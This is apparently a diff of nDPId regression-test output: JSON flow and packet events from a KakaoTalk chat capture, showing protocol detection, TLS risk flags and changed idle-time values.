+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} 
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} 
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -88,150 +88,150 @@ 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"thread_ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} 
